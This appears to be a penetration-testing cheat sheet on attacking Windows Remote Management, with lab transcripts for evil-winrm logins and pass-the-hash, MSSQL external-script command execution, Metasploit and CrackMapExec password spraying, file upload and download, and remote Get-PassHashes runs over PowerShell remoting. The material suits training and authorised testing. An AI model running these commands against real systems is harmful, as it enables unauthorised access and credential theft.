WinRM (5985, 5986)

Nmap

nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

Evil-WinRM

evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!
evil-winrm -u "$USER" -H "$NT_HASH" -i "$TARGET"`

To use evil-winrm to connect to an IPv6 address create an entry inside /etc/hosts setting a domain name to the IPv6 address and connect to that domain.

SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv6 Address. . . . . . . . . . . : dead:beef::1001
   IPv6 Address. . . . . . . . . . . : dead:beef::7912:217c:56e7:f15b
   Link-local IPv6 Address . . . . . : fe80::d379:8c3e:971a:5199%8
   IPv4 Address. . . . . . . . . . . : 10.13.38.11
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : dead:beef::1
                                       fe80::250:56ff:fe94:1921%8
                                       10.13.38.2

Ethernet adapter Ethernet1 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.20.128.101
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 

Express Edition will continue to be enforced.

SQL (hacker  dbo@flag)> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script: 
COMPATIBILITY

Express Edition will continue to be enforced.

# cat /etc/hosts | grep comp
dead:beef::1001 compatibility
# evil-winrm -u 'administrator' -p 'SecretPassword' -i compatibility
                                        
Evil-WinRM shell v3.5
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

With docker

docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i 10.129.111.232 -u Administrator -p 'password'

Upload

*Evil-WinRM* PS C:\Users\Administrator\Documents> upload PowerView.ps1 C:\Users\Administrator\Desktop

Download

*Evil-WinRM* PS C:\Users\Administrator\Desktop> download 20240308092156_BloodHound.zip

Metasploit

msf6 auxiliary(scanner/winrm/winrm_login) > set rhosts 192.168.210.17
rhosts => 192.168.210.17
msf6 auxiliary(scanner/winrm/winrm_login) > set USERNAME Administrator
USERNAME => Administrator
msf6 auxiliary(scanner/winrm/winrm_login) > set DOMAIN internal.zsm.local
DOMAIN => internal.zsm.local
msf6 auxiliary(scanner/winrm/winrm_login) > set PASSWORD aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
PASSWORD => aad3b435b51404eeaad3b435b51404ee:543beb20a2a579c7714ced68a1760d5e
msf6 auxiliary(scanner/winrm/winrm_login) > run

[!] No active DB -- Credential data will not be saved!
[+] 192.168.210.17:5985 - Login Successful:

Netexec - CME

$ crackmapexec winrm 10.129.42.197 -u user.list -p password.list

WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Command execution

[Apr 09, 2024 - 01:22:53 (EDT)] exegol-CPTS /workspace # nxc winrm 10.129.202.136 -u john -p november -X 'dir c:\'
SMB         10.129.202.136  445    WINSRV           [*] Windows 10.0 Build 17763 (name:WINSRV) (domain:WINSRV)
WINRM       10.129.202.136  5985   WINSRV           [+] WINSRV\john:november (admin)
WINRM       10.129.202.136  5985   WINSRV           [+] Executed command (shell type: powershell)
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Directory: C:\
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           
WINRM       10.129.202.136  5985   WINSRV           Mode                LastWriteTime         Length Name
WINRM       10.129.202.136  5985   WINSRV           ----                -------------         ------ ----
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                PerfLogs
WINRM       10.129.202.136  5985   WINSRV           d-r---       12/14/2020   6:38 PM                Program Files
WINRM       10.129.202.136  5985   WINSRV           d-----        2/11/2022   6:10 AM                Program Files (x86)
WINRM       10.129.202.136  5985   WINSRV           d-r---         1/6/2022   6:49 AM                Users
WINRM       10.129.202.136  5985   WINSRV           d-----       12/14/2020   7:11 PM                Windows
WINRM       10.129.202.136  5985   WINSRV           
[Apr 09, 2024 - 01:23:02 (EDT)] exegol-CPTS /workspace #

PSSession

Enabled by default on Server 2012 onwards with firewall exception

PSRemoting uses WinRM

On Desktop, may need to enable remoting (admin privs needed): Enable-PSRemoting

Create a session on a remote computer

$Server01 = New-PSSession -ComputerName Server01

List PSSession

Get-PSSession

Enter-PSSession

To use the PSSession to interact directly with a remote computer, use the Enter-PSSession cmdlet

PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT
[SEC504STUDENT]: PS C:\Users\Sec504\Documents>

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Get-Service | Where-Object -Property Status -EQ Running

Status   Name               DisplayName
------   ----               -----------
Running  AarSvc_75beb       Agent Activation Runtime_75beb
Running  Appinfo            Application Information
Running  AppXSvc            AppX Deployment Service (AppXSVC)
Running  AudioEndpointBu... Windows Audio Endpoint Builder
Running  Audiosrv           Windows Audio
Running  BFE                Base Filtering Engine
...

[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>

Pass Username / password

New-PSSession -Session $s -Credential Domain01\User01

With a variable

PS C:\WINDOWS\system32> $cred = Get-Credential

cmdlet Get-Credential at command pipeline position 1
Supply values for the following parameters:
Credential
PS C:\WINDOWS\system32> $cred

UserName                     Password
--------                     --------
sec504   System.Security.SecureString

Or

$Username = « USERNAME »
$SecurePassword = « PLAINPASSWORD » | ConvertTo-SecureString -AsPlainText -Force
$PScred = New-Object System.Management.Automation.PSCredential -ArgumentList $UserName,$SecurePassword
$cred = New-Object Management.Automation.PSCredential ("Administrator", (ConvertTo-SecureString "Sup3Rp@ssw0rd" -AsPlainText -Force))
PS C:\WINDOWS\system32> Enter-PSSession -ComputerName SEC504STUDENT -Credential $cred
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> $env:USERNAME
Sec504
[SEC504STUDENT]: PS C:\Users\Sec504\Documents> Exit-PSSession
PS C:\WINDOWS\system32>

Interact with an existing session

Enter-PSSession -Id 19
Enter-PSSession -Name Session1
Enter-PSSession -Session $session1

Execute command or scriptblocks

Invoke-Command -ScriptBlock{hostname;whoami} -Session $session1
Invoke-Command -ScriptBlock{C:\Users\Public\hostname.ps1} -Session $session1

Invoke-Command -ScriptBlock{Get-Process} -ComputerName (Get-Content <list_of_servers>)
Invoke-Command -FilePath C:\scripts\script.ps1 -ComputerName (Get-Content <list_of_servers>)

Execute locally loaded function on the remote machines

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>)

Invoke-Command -ScriptBlock ${function:Get-PassHashes} -ComputerName (Get-Content <list_of_servers>) -ArgumentList

Stateful commands

$Sess = New-PSSession -Computername Server1
Invoke-Command -Session $Sess -ScriptBlock {$Proc = Get-Process}
Invoke-Command -Session $Sess -ScriptBlock {$Proc.Name}

Winrs

winrs -remote:server1 -u:server1\administrator -p:passw0rd hostname

WSMan-WinRM

Resources

PreviousSSH (22)NextWMI (135)

Last updated